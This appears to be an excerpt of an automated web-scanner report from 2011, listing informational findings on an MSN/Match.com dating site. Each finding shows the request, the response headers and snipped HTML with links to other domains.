<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=kellykristy&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/01/00/66410100O.jpeg" alt="kellykristy" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/12/38/61741238B.jpeg" alt="steph9595" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=steph9595&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/12/38/61741238B.jpeg" alt="steph9595" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/84/81/20148481C.jpeg" alt="AM1021" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=AM1021&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/84/81/20148481C.jpeg" alt="AM1021" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/76/81/93177681P.jpeg" alt="Jessica33180" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=Jessica33180&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/76/81/93177681P.jpeg" alt="Jessica33180" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/79/73/48397973V.jpeg" alt="iss005" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=iss005&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/79/73/48397973V.jpeg" alt="iss005" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/96/56/70209656A.jpeg" alt="ncjessmarie" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=ncjessmarie&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/96/56/70209656A.jpeg" alt="ncjessmarie" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/03/56/24160356H.jpeg" alt="CaliKD180" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=CaliKD180&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/03/56/24160356H.jpeg" alt="CaliKD180" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/71/10/90967110A.jpeg" alt="charadriuswilson" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=charadriuswilson&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/71/10/90967110A.jpeg" alt="charadriuswilson" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/96/18/98109618F.jpeg" alt="vanessa2200" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=vanessa2200&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/96/18/98109618F.jpeg" alt="vanessa2200" border="0" /></a>
...[SNIP]...
<a href="/qsearch/qsearchdl.aspx?lage=20&uage=30&bd=1&bd=2&bd=3&ex=2&ex=3&ex=4&r2s=1&cpp=floatingreg/msn/default.html" target="_top"><img src="http://images.match.com/s.gif" width="80" height="100" alt="View More Profiles" /></a>
...[SNIP]...
<div id="pnlBtm"><img src="http://cp.match.com/en-us/partner/msn/images/38028_btm.png" width="973" height="8" /></div>
...[SNIP]...

22.65. http://dating.redacted/index.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dating.redacted
Path:   /index.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /index.aspx?TrackingID=516163&BannerID=670269 HTTP/1.1
Host: dating.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:45:48 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: Match=CCount=1&CDate=1/29/2011; expires=Sun, 29-Jan-2012 23:45:48 GMT; path=/
Set-Cookie: dMatch=CCount=1&CDate=1/29/2011; domain=match.com; expires=Sun, 29-Jan-2012 23:45:48 GMT; path=/
Set-Cookie: MatchSession=CDTF=1/29/2011&UMID=f6039d13-3143-4ac4-a040-dd7633dc19c3; expires=Sun, 29-Jan-2012 23:45:48 GMT; path=/
Set-Cookie: SECU=TID=516163&ESID=1329be66-3f67-48b2-8a8b-9bf49c7bbe5b&THEME=74; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43958

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html>
   <head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><link href="/styles/site/core.css?v=8.0.4043.20742" rel="st
...[SNIP]...
<meta name="description" content="MSN Dating & Personals with Match.com is a leading online dating site for singles to search through over 15 million users." />
<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/google.js"></script>
<script type="text/javascript" src="http://cp.match.com/scripts/jquery.shuffle.js"></script>
...[SNIP]...
</script>
<link href="http://cp.match.com/cppp/msn/index/56452/56452.css" rel="stylesheet" type="text/css" />
<style>
...[SNIP]...
<noscript><img
src="http://msnportaldating.112.2O7.net/b/ss/msnportaldating/1/H.1--NS/0"
height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...
<!--[if !IE]>--><script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.mozcompat.2010.js"></script><!--<![endif]-->

<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js"></script>
...[SNIP]...
</script>
<link href="http://cp.match.com/cppp/msn/css/lib.msn.cobrand.hdr.2010.css" rel="stylesheet" type="text/css" />

<!-- BEGIN OMNITURE REPORTING -->
...[SNIP]...
<div><img src="http://msnportaldating.112.2O7.net/b/ss/msnportaldating/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/golf">Golf</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb"> MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar ">NASCAR</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home"><strong>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=AX">Bing</a>
...[SNIP]...
<li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://passport.match.com/passport/ppLogin.asp">Sign in</a>
...[SNIP]...
<div id="optlinks" class="link"><img class="logo" src="http://images.match.com/match/msn/cobrand/poweredby_Match.png" alt="powered by Match.com" /></div>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<li id="navChemistry"><a href="http://msn.chemistry.com/index.aspx?trackingid=516068&bannerid=2053368">Chemistry</a>
...[SNIP]...
<div id="pnlButton"> <img src="http://cp.match.com/cppp/msn/index/47981/btn.gif" width="208" height="36" alt="View Photos &raquo;" class="btnQuickSearch" />
                       <input type="hidden" name="po" value="1" id="po"/>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24684.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24673.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24685.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24674.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24686.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24675.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24687.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24676.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24688.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24678.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24689.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24679.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24690.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24680.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24691.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24681.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24692.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24682.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24779.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24695.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<p><a href="http://msn.chemistry.com/login/login.aspx?trackingid=516068&bannerid=2008010">Member Sign In &raquo;</a>
...[SNIP]...
<div id="arr"><img src="http://cp.match.com/cppp/msn/index/47981/chemarr.gif" width="7" height="11" border="0" /></div>
...[SNIP]...
<div id="opts"><a href="http://msn.chemistry.com/cp/landing/44762?trackingid=516068&bannerid=2053369" target="_blank"><img src="http://cp.match.com/cppp/msn/index/55688/chem1.jpg" width="598" height="141" border="0" /></a>
...[SNIP]...
<a href="/promo/msn72HrsFree2010"><img src="http://cp.match.com/cppp/msn/ad/static/47891/280x115_FT.gif" width="280" height="115" border="0" /></a>
...[SNIP]...
<li><a href="http://www.delish.com/recipes/cooking-recipes/tailgating-football-recipes?ocid=xnetr1-3">Tailgating time: 10 winning recipes</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/watch/video/celebrity-gridiron-fans/ufd8pil8?q=Football+Fan&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNXNM&amp;ocid=xnetr1-5">Bing video: Celebrity gridiron fans</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li class="last"> Follow MSN on <a href="http://www.followredacted/?ocid=TXT_MSNCH_DATING_FollowMSN">Facebook</a> | <a href="http://www.followredacted/?ocid=TXT_MSNCH_DATING_FollowMSN">Twitter</a>
...[SNIP]...

22.66. http://dating.redacted/index.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dating.redacted
Path:   /index.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /index.aspx?TrackingID=516163&BannerID=670269 HTTP/1.1
Host: dating.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 16:43:51 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: Match=CCount=1&CDate=1/30/2011; expires=Mon, 30-Jan-2012 16:43:50 GMT; path=/
Set-Cookie: dMatch=CCount=1&CDate=1/30/2011; domain=match.com; expires=Mon, 30-Jan-2012 16:43:50 GMT; path=/
Set-Cookie: MatchSession=CDTF=1/30/2011&UMID=57b51d72-4ae5-4580-b5e3-4d6f6053acaf; expires=Mon, 30-Jan-2012 16:43:50 GMT; path=/
Set-Cookie: SECU=TID=516163&ESID=abea2b79-7aba-4005-91f1-08deb2cdba45&THEME=83; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43968

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html>
   <head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><link href="/styles/site/core.css?v=8.0.4043.20742" rel="st
...[SNIP]...
<meta name="description" content="MSN Dating & Personals with Match.com is a leading online dating site for singles to search through over 15 million users." />
<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/google.js"></script>
<script type="text/javascript" src="http://cp.match.com/scripts/jquery.shuffle.js"></script>
...[SNIP]...
</script>
<link href="http://cp.match.com/cppp/msn/index/56452/56452.css" rel="stylesheet" type="text/css" />
<style>
...[SNIP]...
<noscript><img
src="http://msnportaldating.112.2O7.net/b/ss/msnportaldating/1/H.1--NS/0"
height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...
<!--[if !IE]>--><script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.mozcompat.2010.js"></script><!--<![endif]-->

<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js"></script>
...[SNIP]...
</script>
<link href="http://cp.match.com/cppp/msn/css/lib.msn.cobrand.hdr.2010.css" rel="stylesheet" type="text/css" />

<!-- BEGIN OMNITURE REPORTING -->
...[SNIP]...
<div><img src="http://msnportaldating.112.2O7.net/b/ss/msnportaldating/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/golf">Golf</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb"> MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar ">NASCAR</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home"><strong>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=AX">Bing</a>
...[SNIP]...
<li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://passport.match.com/passport/ppLogin.asp">Sign in</a>
...[SNIP]...
<div id="optlinks" class="link"><img class="logo" src="http://images.match.com/match/msn/cobrand/poweredby_Match.png" alt="powered by Match.com" /></div>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<li id="navChemistry"><a href="http://msn.chemistry.com/index.aspx?trackingid=516068&bannerid=2053368">Chemistry</a>
...[SNIP]...
<div id="pnlButton"> <img src="http://cp.match.com/cppp/msn/index/47981/btn.gif" width="208" height="36" alt="View Photos &raquo;" class="btnQuickSearch" />
                       <input type="hidden" name="po" value="1" id="po"/>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24684.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24673.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24685.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24674.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24686.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24675.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24687.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24676.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24688.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24678.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24689.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24679.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24690.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24680.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24691.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24681.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24692.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24682.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24779.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24695.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<p><a href="http://msn.chemistry.com/login/login.aspx?trackingid=516068&bannerid=2008010">Member Sign In &raquo;</a>
...[SNIP]...
<div id="arr"><img src="http://cp.match.com/cppp/msn/index/47981/chemarr.gif" width="7" height="11" border="0" /></div>
...[SNIP]...
<div id="opts"><a href="http://msn.chemistry.com/cp/landing/44762?trackingid=516068&bannerid=2053369" target="_blank"><img src="http://cp.match.com/cppp/msn/index/55688/chem1.jpg" width="598" height="141" border="0" /></a>
...[SNIP]...
<a href="/windowsphone"><img src="http://cp.match.com/cppp/msn/ad/static/54185windowsphone7.gif" width="279" height="115" border="0" /></a>
...[SNIP]...
<li><a href="http://www.delish.com/recipes/cooking-recipes/tailgating-football-recipes?ocid=xnetr1-3">Tailgating time: 10 winning recipes</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/watch/video/celebrity-gridiron-fans/ufd8pil8?q=Football+Fan&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNXNM&amp;ocid=xnetr1-5">Bing video: Celebrity gridiron fans</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li class="last"> Follow MSN on <a href="http://www.followredacted/?ocid=TXT_MSNCH_DATING_FollowMSN">Facebook</a> | <a href="http://www.followredacted/?ocid=TXT_MSNCH_DATING_FollowMSN">Twitter</a>
...[SNIP]...

22.67. http://dating.redacted/search/index.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dating.redacted
Path:   /search/index.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /search/index.aspx?TrackingID=526133&BannerID=722765&q=man,woman,18,35&gt1=26000 HTTP/1.1
Host: dating.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 16:44:09 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: Match=CCount=1&CDate=1/30/2011; expires=Mon, 30-Jan-2012 16:44:08 GMT; path=/
Set-Cookie: dMatch=CCount=1&CDate=1/30/2011; domain=match.com; expires=Mon, 30-Jan-2012 16:44:08 GMT; path=/
Set-Cookie: MatchSession=CDTF=1/30/2011&UMID=01d4ea11-8115-4024-bfb5-8c4ad5ccb98e; expires=Mon, 30-Jan-2012 16:44:08 GMT; path=/
Set-Cookie: SECU=TID=526133&ESID=acd347de-dd09-4896-9662-735b56bc36e8&THEME=74; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 84347

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
   <head><meta http-equiv=
...[SNIP]...
<!--[if !IE]>--><script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.mozcompat.2010.js"></script><!--<![endif]-->

<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js"></script>
...[SNIP]...
</script>
<link href="http://cp.match.com/cppp/msn/css/lib.msn.cobrand.hdr.2010.css" rel="stylesheet" type="text/css" />

<!-- BEGIN OMNITURE REPORTING -->
...[SNIP]...
<div><img src="http://msnportaldating.112.2O7.net/b/ss/msnportaldating/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/golf">Golf</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb"> MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar ">NASCAR</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home"><strong>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=AX">Bing</a>
...[SNIP]...
<li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://passport.match.com/passport/ppLogin.asp">Sign in</a>
...[SNIP]...
<div id="optlinks" class="link"><img class="logo" src="http://images.match.com/match/msn/cobrand/poweredby_Match.png" alt="powered by Match.com" /></div>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<a href="http://dating.msn.com/index.aspx?lid=2&amp;ird=1"><img src="http://images.match.com/match/presentations/nonemoreblack/header/13163_matchLogo.gif" alt="match.com" style="border-width:0px;" /></a>
...[SNIP]...
<div class="close modal_dismiss">
    <img id="ctl00_matchHeader_ctl00_Image10" alt="Close" src="http://images.match.com/match/doubleblind/xCloseModal.gif" style="height:16px;width:16px;border-width:0px;" />
    </div>
...[SNIP]...
<a id="ctl00_matchHeader_ctl00_HyperLink6" href="http://dating.msn.com/subscribe/subscribe.aspx?lid=1"><img id="ctl00_matchHeader_ctl00_Image5" src="http://images.match.com/match/presentations/nonemoreblack/header/13272_subscribe_fin_becauseofyou.gif" style="border-width:0px;" />
                   <!-- Start //WI: 9402: blue "Subscribe Today" banner 100% on the sharkin : SM -09/11 -->
...[SNIP]...
<a id="ctl00_matchHeader_ctl00_Hyperlink13" class="iGuideFin" href="/cp.aspx?cpp=/en-us/match/whitneycasey/video.html&amp;linkid=1"><img id="ctl00_matchHeader_ctl00_Image7" src="http://images.match.com/match/presentations/nonemoreblack/header/15446_tipsFin.gif" alt="Rev Up Your love Life With These Tips!" style="border-width:0px;" /></a>
...[SNIP]...
</div>
   <img alt="Search Now" border="0" class="btnQuickSearch" src="http://images.match.com/match/search/redesign/quickSearchBtn.gif" style="height:29px;width:132px;border-width:0px;" />
   <input type="hidden" name="cl" value="1" id="cl" />
...[SNIP]...
